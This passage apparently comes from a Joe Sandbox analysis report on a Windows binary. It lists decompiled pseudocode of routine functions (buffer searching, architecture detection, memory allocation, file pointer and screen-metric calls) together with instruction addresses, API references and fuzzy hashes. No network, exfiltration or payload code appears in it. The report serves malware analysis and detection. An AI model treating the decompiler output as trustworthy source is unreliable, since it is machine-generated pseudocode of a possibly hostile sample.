													goto L33;
												} else {
													_t69 = _v8;
													_t84 = _v16;
													continue;
												}
											}
											goto L31;
										}
										_v24 = _v24 + _t69;
										asm("adc dword [ebp-0x10], 0x0");
										memmove(_t50, _t50 + _t69, 0x20);
										_t107 = _t107 + 0xc;
										continue;
									}
								}
								goto L31;
							}
						} else {
							__eflags =  *_t46 |  *(_t46 + 4);
							if(( *_t46 |  *(_t46 + 4)) != 0) {
								goto L7;
							} else {
								_t44 = 1;
							}
						}
					} else {
						_t44 = 0;
					}
				}
				L3:
				return _t44;
			}

0x00416405
0x0041640b
0x00416412
0x00416419
0x00416422
0x0041642c
0x0041642f
0x00416431
0x0041643f
0x00416440
0x00416445
0x0041644a
0x0041644e
0x0041644e
0x0041644e
0x00416453
0x00416457
0x0041645a
0x0041645b
0x0041645b
0x00416462
0x00416462
0x00416465
0x00416467
0x00416469
0x00000000
0x00000000
0x0041646d
0x00416473
0x00416476
0x00416478
0x00000000
0x0041647a
0x0041647a
0x00416480
0x00416480
0x00416482
0x00416484
0x00416524
0x00416526
0x00416526
0x00000000
0x00000000
0x00000000
0x0041647c
0x0041647c
0x0041647e
0x00000000
0x00000000
0x00000000
0x00000000
0x0041647e
0x0041647a
0x00416527
0x00416527
0x0041652a
0x00416530
0x00000000
0x0041648a
0x0041648a
0x0041648f
0x004164a0
0x004164a3
0x004164a5
0x0041656b
0x0041656b
0x004164ab
0x004164ab
0x004164ae
0x004164b0
0x00000000
0x004164b2
0x004164b2
0x004164b2
0x004164b4
0x004164b4
0x004164b7
0x004164bb
0x004164be
0x004164c0
0x00000000
0x00000000
0x00000000
0x00000000
0x004164c2
0x004164c2
0x004164c2
0x004164c5
0x00000000
0x00000000
0x004164c7
0x004164cb
0x004164e2
0x004164cd
0x004164cd
0x004164d1
0x004164e5
0x004164d3
0x004164d3
0x004164d7
0x004164ea
0x004164ea
0x004164d9
0x004164d9
0x004164dc
0x004164de
0x00000000
0x00000000
0x004164e0
0x004164de
0x004164d7
0x004164d1
0x00000000
0x004164cb
0x004164ed
0x004164ef
0x00000000
0x004164f1
0x004164f5
0x004164f8
0x004164fd
0x004164ff
0x0041653d
0x00416541
0x00416548
0x0041654b
0x00416551
0x00416554
0x0041655f
0x0041655f
0x00416563
0x00416568
0x00000000
0x00416501
0x00416501
0x00416504
0x00000000
0x00416504
0x004164ff
0x00000000
0x004164ef
0x00416509
0x0041650e
0x00416516
0x0041651c
0x00000000
0x0041651c
0x004164b0
0x00000000
0x004164a5
0x00416433
0x00416435
0x00416438
0x00000000
0x0041643a
0x0041643c
0x0041643c
0x00416438
0x00416424
0x00416424
0x00416424
0x00416422
0x00416426
0x00416429

APIs

??2@YAPAXI@Z.MSVCRT ref: 00416445
memmove.MSVCRT ref: 00416516
??3@YAXPAX@Z.MSVCRT ref: 0041652A

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??2@??3@memmove
String ID:
API String ID: 3828600508-0
Opcode ID: c18fc47b9d316d0b8eb0587c4507b913416737efac7e8c8247c4051749e20084
Instruction ID: e46483b1e26eb5a1fabff0b355717e6b670c62617ced1e5d33f235f132d045da
Opcode Fuzzy Hash: c18fc47b9d316d0b8eb0587c4507b913416737efac7e8c8247c4051749e20084
Instruction Fuzzy Hash: 2351B372A00111ABDF28CE58D944AEF77B5EB44344F26805EEC0AA7245D778ED81C79C

Uniqueness

Uniqueness Score: -1.00%

Function 00404E67, Relevance: 4.6, APIs: 3, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00404E67(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char _v32;
				char _v44;
				char _v56;
				void* _t46;
				void* _t54;
				char** _t61;
				void* _t67;
				char** _t74;
				void* _t79;
				char* _t102;
				char* _t105;
				void* _t107;
				char** _t108;
				char** _t109;

				_t107 = __edx;
				_v8 = __ecx;
				_t46 = E00403FB2(); // executed
				if(_t46 == 0) {
					_v20 = "x86";
					_v16 = "i386";
					goto L5;
				} else {
					_t114 = _t46 - 9;
					if(_t46 == 9) {
						_v20 = "x64";
						_v16 = "amd64";
						L5:
						_v12 = 0;
					} else {
						_v20 = 0;
					}
				}
				E00411743(E00411743(E00411743(_t46,  &_v56),  &_v44),  &_v32);
				_t79 = 0;
				E00404048(0, 0,  &_v56,  &_v44);
				_t54 = E004031BE(_v8, _v56, _t114, _v44,  &_v32); // executed
				if(_t54 != 0) {
					_t79 = 1;
				}
				E004117FD(_t107,  &_v32);
				_t102 = _v20;
				_t108 =  &_v20;
				while(1) {
					_push( &_v44);
					_push( &_v56);
					_t117 = _t102;
					if(_t102 == 0) {
						break;
					}
					E00404048(0, _t102);
					_t61 = E004031BE(_v8, _v56, __eflags, _v44,  &_v32); // executed
					__eflags = _t61;
					if(_t61 != 0) {
						__eflags =  *(_t107 + 4);
						if(__eflags != 0) {
							E00411846(_t107, "\r\n");
						}
						E0041187C(_t107, __eflags,  &_v32);
						_t79 = 1;
					}
					_t108 =  &(_t108[1]);
					__eflags = _t108;
					_t102 =  *_t108;
				}
				E00404048( *0x41e730 & 0x0000ffff, _t102);
				_t67 = E004031BE(_v8, _v56, _t117, _v44,  &_v32); // executed
				_t118 = _t67;
				if(_t67 != 0) {
					_t79 = 1;
				}
				E0041187C(_t107, _t118,  &_v32);
				_t105 = _v20;
				_t109 =  &_v20;
				while(_t105 != 0) {
					E00404048( *0x41e730 & 0x0000ffff, _t105,  &_v56,  &_v44);
					_t74 = E004031BE(_v8, _v56, __eflags, _v44,  &_v32); // executed
					__eflags = _t74;
					if(_t74 != 0) {
						__eflags =  *(_t107 + 4);
						if(__eflags != 0) {
							E00411846(_t107, "\r\n");
						}
						E0041187C(_t107, __eflags,  &_v32);
						_t79 = 1;
					}
					_t109 =  &(_t109[1]);
					__eflags = _t109;
					_t105 =  *_t109;
				}
				_push(_v32);
				L004191B0();
				_push(_v44);
				L004191B0();
				_push(_v56);
				L004191B0();
				return _t79;
			}

0x00404e70
0x00404e72
0x00404e75
0x00404e7e
0x00404e9a
0x00404ea1
0x00000000
0x00404e80
0x00404e80
0x00404e83
0x00404e8a
0x00404e91
0x00404ea8
0x00404ea8
0x00404e85
0x00404e85
0x00404e85
0x00404e83
0x00404ebe
0x00404ecf
0x00404ed1
0x00404ee3
0x00404eea
0x00404eec
0x00404eec
0x00404ef4
0x00404ef9
0x00404efc
0x00404f42
0x00404f45
0x00404f49
0x00404f4a
0x00404f4c
0x00000000
0x00000000
0x00404f03
0x00404f15
0x00404f1a
0x00404f1c
0x00404f1e
0x00404f22
0x00404f2b
0x00404f2b
0x00404f36
0x00404f3b
0x00404f3b
0x00404f3d
0x00404f3d
0x00404f40
0x00404f40
0x00404f55
0x00404f67
0x00404f6c
0x00404f6e
0x00404f70
0x00404f70
0x00404f78
0x00404f7d
0x00404f80
0x00404fd3
0x00404f94
0x00404fa6
0x00404fab
0x00404fad
0x00404faf
0x00404fb3
0x00404fbc
0x00404fbc
0x00404fc7
0x00404fcc
0x00404fcc
0x00404fce
0x00404fce
0x00404fd1
0x00404fd1
0x00404fd7
0x00404fda
0x00404fdf
0x00404fe2
0x00404fe7
0x00404fea
0x00404ff8

APIs

Part of subcall function 00403FB2: GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 00403FC3
Part of subcall function 00403FB2: GetNativeSystemInfo.KERNELBASE(?,?,?,00403FE2,004061EA,00000001,00000001,00000000,?,00000000), ref: 00403FD1

??3@YAXPAX@Z.MSVCRT ref: 00404FDA
??3@YAXPAX@Z.MSVCRT ref: 00404FE2
??3@YAXPAX@Z.MSVCRT ref: 00404FEA

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$AddressInfoNativeProcSystem
String ID:
API String ID: 3731959171-0
Opcode ID: 5c283d7852b514708a02b75cb6ebbc8b54e1ca4fb39554e1d11dd4f09c4b7cc9
Instruction ID: 186da13b794c0488880814f39f9d3c8b5d3938503a91300c0f4d7e9b813a1536
Opcode Fuzzy Hash: 5c283d7852b514708a02b75cb6ebbc8b54e1ca4fb39554e1d11dd4f09c4b7cc9
Instruction Fuzzy Hash: D8411EB1D0100AABCF05EF91D9519EEB77AAF84308B14802BE61177291DB3D9E46CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040261B, Relevance: 4.5, APIs: 3, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040261B(void** __ecx) {
				unsigned int _t13;
				void* _t15;
				signed int _t16;
				void* _t19;
				signed int _t30;
				signed int _t33;
				void** _t35;
				void* _t38;

				_t35 = __ecx;
				_t1 =  &(_t35[2]); // 0xb8
				_t13 =  *_t1;
				_t38 = __ecx[1] - _t13;
				if(_t38 == 0) {
					_t4 = _t13 + 1; // 0xb9
					_t33 = (_t13 >> 2) + _t4;
					_t30 = 4;
					_t15 = _t33 * _t30;
					_push( ~(0 | _t38 > 0x00000000) | _t15); // executed
					L004191BC(); // executed
					_t19 = _t15;
					_t11 =  &(_t35[1]); // 0x9f
					_t16 =  *_t11;
					if(_t16 != 0) {
						_t16 = memcpy(_t19,  *__ecx, _t16 << 2);
					}
					_push( *_t35);
					L004191B0();
					_t35[2] = _t33;
					 *_t35 = _t19;
					return _t16;
				}
				return _t13;
			}

0x0040261c
0x0040261e
0x0040261e
0x00402621
0x00402624
0x0040262d
0x0040262d
0x00402635
0x00402638
0x00402641
0x00402642
0x00402647
0x00402649
0x00402649
0x0040264f
0x00402658
0x0040265d
0x00402660
0x00402662
0x00402668
0x0040266c
0x00000000
0x0040266e
0x00402670

APIs

??2@YAPAXI@Z.MSVCRT ref: 00402642
memcpy.MSVCRT ref: 00402658
??3@YAXPAX@Z.MSVCRT ref: 00402662

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??2@??3@memcpy
String ID:
API String ID: 1695611338-0
Opcode ID: c8fccc3a357c8588de69ed6819abebefdc5c83b5df6e44c8178f50c83a564142
Instruction ID: 3128898482240f30860ec0696dad7cac5071265099a7425bdad65f2bee3c1790
Opcode Fuzzy Hash: c8fccc3a357c8588de69ed6819abebefdc5c83b5df6e44c8178f50c83a564142
Instruction Fuzzy Hash: 27F0B4722002016BE7345A2DEC5A867F3D9EF88314714493FF58BD66D5DA759C808618

Uniqueness

Uniqueness Score: -1.00%

Function 00411917, Relevance: 4.5, APIs: 3, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00411917(signed int* __ecx, signed int _a4) {
				signed int _t13;
				signed int _t16;
				signed int _t24;
				signed int _t26;
				signed int* _t27;
				void* _t28;

				_t16 = _a4;
				_t27 = __ecx;
				_t28 = _t16 - 0x40000000;
				if(_t28 >= 0) {
					_push(0x41c9d4);
					_push( &_a4);
					_a4 = 0x13329ad;
					L00419360();
				}
				_t24 = 2;
				_t4 = _t16 + 1; // 0x13329ae
				_t13 = _t4 * _t24;
				_push( ~(0 | _t28 > 0x00000000) | _t13); // executed
				L004191BC(); // executed
				_t26 = _t13;
				 *_t26 = 0;
				_push( *_t27);
				L004191B0();
				 *_t27 = _t26;
				_t27[2] = _t16;
				return 0;
			}

0x0041191b
0x00411920
0x00411922
0x00411928
0x0041192a
0x00411932
0x00411933
0x0041193a
0x0041193a
0x00411943
0x00411944
0x00411947
0x00411950
0x00411951
0x00411956
0x0041195a
0x0041195d
0x0041195f
0x00411966
0x00411969
0x0041196f

APIs

_CxxThrowException.MSVCRT(013329AD,0041C9D4), ref: 0041193A
??2@YAPAXI@Z.MSVCRT ref: 00411951
??3@YAXPAX@Z.MSVCRT ref: 0041195F

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??2@??3@ExceptionThrow
String ID:
API String ID: 414134242-0
Opcode ID: 9005b9272c02a17b4803d26cb9a19a82ecbc209881d2840890fafd6be5aff754
Instruction ID: c621846103c8ddcb65026c60fb07db005e1f9199828ea9e7cb675591bcc0e13e
Opcode Fuzzy Hash: 9005b9272c02a17b4803d26cb9a19a82ecbc209881d2840890fafd6be5aff754
Instruction Fuzzy Hash: 0EF0E9731102057FD7049F2AD8869DAF7EDEF44354B20803FF549C6150D63198C0876C

Uniqueness

Uniqueness Score: -1.00%

Function 004031BE, Relevance: 3.9, APIs: 3, Instructions: 125
stringCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E004031BE(intOrPtr* __ecx, CHAR* __edx, void* __eflags, CHAR* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				CHAR* _v32;
				int _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr* _v52;
				void _v4148;
				intOrPtr* _t66;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr* _t81;
				char _t83;
				intOrPtr* _t86;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t104;
				int _t108;
				void* _t111;
				void* _t112;

				_t86 = __ecx;
				E00419210(0x1030, __ecx);
				_t104 = _t86;
				_v32 = __edx;
				_v52 = _t104;
				 *((intOrPtr*)( *_t104 + 0x10))(_t104, 0, 0, 0, 0);
				_t66 = _a8;
				 *((intOrPtr*)(_t66 + 4)) = 0;
				 *((char*)( *_t66)) = 0;
				_v20 = lstrlenA(_v32);
				_v36 = lstrlenA(_a4);
				_t108 = 0;
				_v5 = 0;
				_v28 = 0;
				_v24 = 0;
				while(1) {
					L2:
					_push( &_v48);
					_push(0x1000 - _t108);
					_push(_t111 + _t108 - 0x1030);
					_push(_t104); // executed
					if( *((intOrPtr*)( *_t104 + 0xc))() != 0) {
						break;
					}
					_t73 = _v48;
					if(_t73 == 0) {
						break;
					}
					_t74 = _t73 + _t108;
					_v44 = _t74;
					_v16 = 0;
					_v12 =  &_v4148;
					while(1) {
						L5:
						_t92 = _v16;
						_t99 = _t74;
						if(_v5 == 0) {
							break;
						}
						if(_t92 > _t99 - _v36) {
							L14:
							_v28 = _v28 + _t92;
							_t108 = _t74 - _t92;
							asm("adc [ebp-0x14], ebx");
							memmove( &_v4148, _t111 + _t92 - 0x1030, _t108);
							_t112 = _t112 + 0xc;
							if(_v24 > 0 || _v28 > 0x100000) {
								return 0 |  *((intOrPtr*)(_a8 + 4)) != 0x00000000;
							} else {
								_t104 = _v52;
								goto L2;
							}
						}
						_t81 = _v12;
						asm("repe cmpsb");
						if(0 == 0) {
							return 1;
						}
						_t83 =  *_t81;
						_v40 = _t83;
						if(_t83 == 0) {
							goto L18;
						}
						E00403087(_a8, _v40);
						_v16 = _v16 + 1;
						_v12 = _v12 + 1;
						_t74 = _v44;
					}
					if(_t92 > _t99 - _v20) {
						goto L14;
					}
					asm("repe cmpsb");
					if(0 != 0) {
						_v16 = _v16 + 1;
						_v12 = _v12 + 1;
					} else {
						_t95 = _v20;
						_v16 = _v16 + _t95;
						_v12 = _v12 + _t95;
						_v5 = 1;
					}
					goto L5;
				}
				L18:
				return 0;
			}

0x004031be
0x004031c6
0x004031d3
0x004031d9
0x004031dc
0x004031df
0x004031e2
0x004031ee
0x004031f3
0x004031fa
0x004031ff
0x00403202
0x00403204
0x00403207
0x0040320a
0x00403212
0x00403212
0x00403217
0x0040321f
0x00403227
0x00403228
0x0040322e
0x00000000
0x00000000
0x00403234
0x00403239
0x00000000
0x00000000
0x0040323f
0x00403247
0x0040324a
0x0040324d
0x00403250
0x00403250
0x00403250
0x00403253
0x00403258
0x00000000
0x00000000
0x0040325f
0x004032c6
0x004032c8
0x004032cb
0x004032d4
0x004032e0
0x004032e6
0x004032ec
0x00000000
0x0040320f
0x0040320f
0x00000000
0x0040320f
0x004032ec
0x00403261
0x0040326e
0x00403270
0x00000000
0x00403308
0x00403276
0x00403278
0x0040327d
0x00000000
0x00000000
0x00403289
0x0040328e
0x00403291
0x00403294
0x00403294
0x0040329e
0x00000000
0x00000000
0x004032ab
0x004032ad
0x004032be
0x004032c1
0x004032af
0x004032af
0x004032b2
0x004032b5
0x004032b8
0x004032b8
0x00000000
0x004032ad
0x0040330c
0x00000000

APIs

lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00BC25D8,00000000,?,00404EE8,?,?,?,?,?), ref: 004031F5
lstrlenA.KERNEL32(00BC25D8,?,00000000,00000000,00000000,00000000,?,00BC25D8,00000000,?,00404EE8,?,?,?,?,?), ref: 004031FD
memmove.MSVCRT ref: 004032E0

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: lstrlen$memmove
String ID:
API String ID: 1832346882-0
Opcode ID: d3b4572a5035ea254cd94ab5b5b1443f4ae13b851958d648fafb26d562424527
Instruction ID: 6402f2dcb6e7945984cbe825a7499a6737a03c255d7b5dcfc401763690269d5e
Opcode Fuzzy Hash: d3b4572a5035ea254cd94ab5b5b1443f4ae13b851958d648fafb26d562424527
Instruction Fuzzy Hash: 48410371D00258AFCB14DFA9C8948EEBFB9FF48351F1480AAE815B7245D7389E85CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004111BB, Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004111BB(void** __ecx, long _a4, long _a8, long _a12, intOrPtr* _a16) {
				long _v8;
				long _t11;
				intOrPtr* _t13;
				void* _t14;
				long _t23;

				_push(__ecx);
				_v8 = _a8;
				_t11 = SetFilePointer( *__ecx, _a4,  &_v8, _a12); // executed
				_t23 = _t11;
				if(_t23 != 0xffffffff || GetLastError() == 0) {
					asm("adc edx, eax");
					_t13 = _a16;
					 *_t13 = 0 + _t23;
					 *((intOrPtr*)(_t13 + 4)) = _v8;
					_t14 = 1;
				} else {
					_t14 = 0;
				}
				return _t14;
			}

0x004111be
0x004111c8
0x004111d7
0x004111dd
0x004111e2
0x004111fb
0x004111fd
0x00411200
0x00411202
0x00411205
0x004111ee
0x004111ee
0x004111ee
0x00411209

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 004111D7
GetLastError.KERNEL32(?,?,?,?), ref: 004111E4

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 30d92e823d37ce749e0f7cd4d34f4784bcb9e104199bba823438aa63f853fc4d
Instruction ID: cdad48c5939bcc49fa85d80ef965e6b95473a265ce0d2249c6c6cde8a06b51fe
Opcode Fuzzy Hash: 30d92e823d37ce749e0f7cd4d34f4784bcb9e104199bba823438aa63f853fc4d
Instruction Fuzzy Hash: 1BF09A71600218AF8F00CF68DC049DB7BE9AF09324B148269E91AD7360E630DE55EB65

Uniqueness

Uniqueness Score: -1.00%

Function 004076D3, Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004076D3(char** __ecx, void* __edx, void* __eflags) {
				void* _t8;
				int _t15;
				void* _t20;
				char** _t24;
				signed int _t26;
				signed int _t27;

				_t20 = __edx;
				_t24 = __ecx;
				 *__ecx = "G]@";
				E00411B60(_t8,  &(__ecx[0xf]));
				__ecx[1] = 0;
				__ecx[2] = 0;
				__ecx[4] = 0;
				__ecx[3] = 0;
				__ecx[7] = 0x18;
				__ecx[0xe] = 0;
				_t26 =  *0x41e8ac; // 0x280
				if(_t26 == 0) {
					_t27 =  *0x41e8b0; // 0x1e0
					if(_t27 == 0) {
						GetSystemMetrics(0x10); // executed
						asm("cdq");
						 *0x41e8ac = 0 - _t20 >> 1;
						_t15 = GetSystemMetrics(0x11);
						asm("cdq");
						 *0x41e8b0 = _t15 - _t20 >> 1;
					}
				}
				return _t24;
			}

0x004076d3
0x004076d4
0x004076d9
0x004076df
0x004076e6
0x004076e9
0x004076ec
0x004076ef
0x004076f2
0x004076f9
0x004076fc
0x00407702
0x00407704
0x0040770a
0x00407715
0x00407717
0x0040771e
0x00407723
0x00407725
0x0040772a
0x0040772f
0x0040770a
0x00407733

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

KiUserCallbackDispatcher.NTDLL ref: 00407715
GetSystemMetrics.USER32 ref: 00407723

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??2@CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 145748454-0
Opcode ID: 479bd63978f28fe7566e90bf22cf9ab23cd4c2d010775e76fc726262a7908e22
Instruction ID: 717b70004c9186839aecef00c0b16e534ce711e486b0d128d54a4644bfe03861
Opcode Fuzzy Hash: 479bd63978f28fe7566e90bf22cf9ab23cd4c2d010775e76fc726262a7908e22
Instruction Fuzzy Hash: A6F017B4A047058FD3A4EF7AA9402C6BAE5BB58300705C93FD986C7690E7B4B445DF89

Uniqueness

Uniqueness Score: -1.00%

Function 004042F3, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004042F3(signed int* __ecx, void* __edx, signed int _a4) {
				int _v12;
				wchar_t* _v16;
				wchar_t* _t12;
				int _t17;
				wchar_t** _t18;

				_t18 = __ecx;
				E00411BBA( &_v16, __ecx);
				_t8 = _a4;
				_t17 = _v12;
				_t12 = _v16;
				if(_a4 >  *((intOrPtr*)(__ecx + 8))) {
					E00411917(__ecx, _t8); // executed
				}
				wcsncpy( *_t18, _t12, _t17);
				_push(_v16);
				L004191B0();
				return  *_t18;
			}

0x004042fb
0x00404302
0x00404307
0x0040430a
0x0040430d
0x00404313
0x00404318
0x00404318
0x00404321
0x00404327
0x0040432c
0x0040433a

APIs

Part of subcall function 00411BBA: memcpy.MSVCRT ref: 00411BD6

wcsncpy.MSVCRT ref: 00404321
??3@YAXPAX@Z.MSVCRT ref: 0040432C

Part of subcall function 00411917: _CxxThrowException.MSVCRT(013329AD,0041C9D4), ref: 0041193A
Part of subcall function 00411917: ??2@YAPAXI@Z.MSVCRT ref: 00411951
Part of subcall function 00411917: ??3@YAXPAX@Z.MSVCRT ref: 0041195F

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@ExceptionThrowmemcpywcsncpy
String ID:
API String ID: 3798114178-0
Opcode ID: da861f791e9c30b0efdd4b8e4f8315abf8b13ff1225adf5b4cd93651072aeb10
Instruction ID: e4b503d843455e4c7bed93abd486b9fcfac02a85a0f9d020e70ade58da263fc1
Opcode Fuzzy Hash: da861f791e9c30b0efdd4b8e4f8315abf8b13ff1225adf5b4cd93651072aeb10
Instruction Fuzzy Hash: 0CF0A076E00014BBDB10AB59DC45C9EB7BDDF85354B10406AF991A3322D731BE90CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00407171, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407171(void** __ecx) {
				void* _t1;
				int _t3;
				long _t4;
				signed int* _t7;

				_t7 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0) {
					L4:
					 *_t7 =  *_t7 & 0x00000000;
					return 0;
				}
				_t3 = FindCloseChangeNotification(_t1); // executed
				if(_t3 != 0) {
					goto L4;
				}
				_t4 = GetLastError();
				if(_t4 != 0) {
					return _t4;
				} else {
					return _t4 + 1;
				}
			}

0x00407172
0x00407174
0x00407178
0x00407192
0x00407192
0x00000000
0x00407195
0x0040717b
0x00407183
0x00000000
0x00000000
0x00407185
0x0040718d
0x00407198
0x0040718f
0x00407191
0x00407191

APIs

FindCloseChangeNotification.KERNELBASE ref: 0040717B
GetLastError.KERNEL32 ref: 00407185

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: ead0b55b2ff90a578750a1408e92beac7d58b39fc771555b91704b17d1c49430
Instruction ID: 7524d8466beb45fe17ee677bdba99b749b9283a1bf838bd9c5283ef0b8d4f745
Opcode Fuzzy Hash: ead0b55b2ff90a578750a1408e92beac7d58b39fc771555b91704b17d1c49430
Instruction Fuzzy Hash: 07D09E316192116BEB605E79B8087A726D8BF00761B15C47AA441D63C5EA78DC42465A

Uniqueness

Uniqueness Score: -1.00%

Function 004191C2, Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

_onexit.KERNELBASE ref: 004191CF
__dllonexit.MSVCRT ref: 004191E5

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: 857932782fbfd3e5608b86d36b9e9192911267ae5c294eb4983a1bf46a2caa49
Instruction ID: 1a651b6f8714b1f0f7d6ab7df4158665d5e0780d4d4d26085a3012ed1205fa6f
Opcode Fuzzy Hash: 857932782fbfd3e5608b86d36b9e9192911267ae5c294eb4983a1bf46a2caa49
Instruction Fuzzy Hash: DFC022B0242202BBCA001F10BD0A8A53F11A750733FF0C32AF069100F0C3B91820BA0B

Uniqueness

